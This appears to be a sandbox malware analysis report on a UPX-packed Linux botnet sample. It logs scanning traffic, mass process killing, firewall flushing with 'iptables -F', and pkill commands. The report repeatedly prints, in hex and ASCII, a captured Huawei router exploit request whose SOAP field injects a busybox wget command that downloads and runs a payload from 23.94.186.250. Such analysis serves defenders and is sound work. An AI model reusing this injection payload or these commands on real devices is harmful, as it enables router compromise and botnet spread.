3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 156.132.235.75
Source: unknown TCP traffic detected without corresponding DNS query: 197.64.238.75
Source: unknown TCP traffic detected without corresponding DNS query: 197.169.115.49
Source: unknown TCP traffic detected without corresponding DNS query: 156.223.17.18
Source: unknown TCP traffic detected without corresponding DNS query: 41.243.213.175
Source: unknown TCP traffic detected without corresponding DNS query: 197.162.0.34
Source: unknown TCP traffic detected without corresponding DNS query: 156.205.100.111
Source: unknown TCP traffic detected without corresponding DNS query: 156.217.17.76
Source: unknown TCP traffic detected without corresponding DNS query: 156.236.63.110
Source: unknown TCP traffic detected without corresponding DNS query: 197.250.231.228
Source: unknown TCP traffic detected without corresponding DNS query: 156.66.156.222
Source: unknown TCP traffic detected without corresponding DNS query: 41.187.70.94
Source: unknown TCP traffic detected without corresponding DNS query: 197.145.181.70
Source: unknown TCP traffic detected without corresponding DNS query: 156.88.123.182
Source: unknown TCP traffic detected without corresponding DNS query: 41.4.20.59
Source: unknown TCP traffic detected without corresponding DNS query: 41.148.250.73
Source: unknown TCP traffic detected without corresponding DNS query: 156.50.184.22
Source: unknown TCP traffic detected without corresponding DNS query: 156.9.220.181
Source: unknown TCP traffic detected without corresponding DNS query: 197.15.78.63
Source: unknown TCP traffic detected without corresponding DNS query: 41.226.3.102
Source: unknown TCP traffic detected without corresponding DNS query: 156.33.233.51
Source: unknown TCP traffic detected without corresponding DNS query: 156.239.48.166
Source: unknown TCP traffic detected without corresponding DNS query: 197.125.79.166
Source: unknown TCP traffic detected without corresponding DNS query: 41.45.213.65
Source: unknown TCP traffic detected without corresponding DNS query: 197.254.225.88
Source: unknown TCP traffic detected without corresponding DNS query: 41.39.106.97
Source: unknown TCP traffic detected without corresponding DNS query: 197.61.177.151
Source: unknown TCP traffic detected without corresponding DNS query: 41.188.169.108
Source: unknown TCP traffic detected without corresponding DNS query: 156.219.220.143
Source: unknown TCP traffic detected without corresponding DNS query: 197.46.33.194
Source: unknown TCP traffic detected without corresponding DNS query: 156.90.119.104
Source: unknown TCP traffic detected without corresponding DNS query: 197.15.87.149
Source: unknown TCP traffic detected without corresponding DNS query: 41.72.111.79
Source: unknown TCP traffic detected without corresponding DNS query: 41.185.178.168
Source: unknown TCP traffic detected without corresponding DNS query: 156.112.150.242
Source: unknown TCP traffic detected without corresponding DNS query: 197.53.243.40
Source: unknown TCP traffic detected without corresponding DNS query: 197.246.254.187
Source: unknown TCP traffic detected without corresponding DNS query: 41.182.248.223
Source: unknown TCP traffic detected without corresponding DNS query: 156.204.147.67
Source: unknown TCP traffic detected without corresponding DNS query: 197.219.77.194
Source: unknown TCP traffic detected without corresponding DNS query: 41.104.90.28
Source: unknown TCP traffic detected without corresponding DNS query: 156.60.22.180
Source: unknown TCP traffic detected without corresponding DNS query: 41.38.175.166
Source: unknown TCP traffic detected without corresponding DNS query: 197.180.177.204
Source: unknown TCP traffic detected without corresponding DNS query: 197.199.51.96
Source: unknown TCP traffic detected without corresponding DNS query: 41.179.58.201
Source: unknown TCP traffic detected without corresponding DNS query: 197.217.58.0
Source: unknown TCP traffic detected without corresponding DNS query: 156.94.149.198
Source: unknown TCP traffic detected without corresponding DNS query: 156.147.188.138
Source: unknown TCP traffic detected without corresponding DNS query: 156.124.129.249
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://23.94.186.250/..23091t/mips;
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: x86, 5245.1.000000001a887bdc.00000000b29d1ae9.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: x86 String found in binary or memory: http://upx.sf.net
Source: x86, 5249.1.0000000095c93fa5.000000003788d25b.rw-.sdmp String found in binary or memory: http://www.cisco.com/go/ciscocp
Source: unknown HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com

System Summary:

barindex
Sample tries to kill many processes (SIGKILL)
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 789, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 800, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1320, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1389, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1809, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1888, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1983, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 2258, result: successful Jump to behavior
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 4487, result: successful Jump to behavior
Sample contains only a LOAD segment without any section mappings
Source: LOAD without section mappings Program segment: 0xc01000
Yara signature match
Source: x86, type: SAMPLE Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Sample tries to kill a process (SIGKILL)
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 789, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 800, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 904, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1320, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1389, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1809, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1888, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 1983, result: successful Jump to behavior
Source: /tmp/x86 (PID: 5253) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 2258, result: successful Jump to behavior
Source: /usr/bin/pkill (PID: 5286) SIGKILL sent: pid: 4487, result: successful Jump to behavior
Source: x86 Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: classification engine Classification label: mal96.spre.troj.evad.lin@0/9@2/0

Data Obfuscation:

barindex
Sample is packed with UPX
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

barindex
Deletes all firewall rules
Source: /bin/sh (PID: 5272) Args: iptables -F Jump to behavior
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /bin/fusermount (PID: 5462) File: /proc/5462/mounts Jump to behavior
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /bin/sh (PID: 5278) Pkill executable: /usr/bin/pkill -> pkill -9 busybox Jump to behavior
Source: /bin/sh (PID: 5284) Pkill executable: /usr/bin/pkill -> pkill -9 perl Jump to behavior
Source: /bin/sh (PID: 5286) Pkill executable: /usr/bin/pkill -> pkill -9 python Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5456) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Source: /usr/share/gdm/generate-config (PID: 5571) Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service Jump to behavior
Executes the "grep" command used to find patterns in files or piped streams
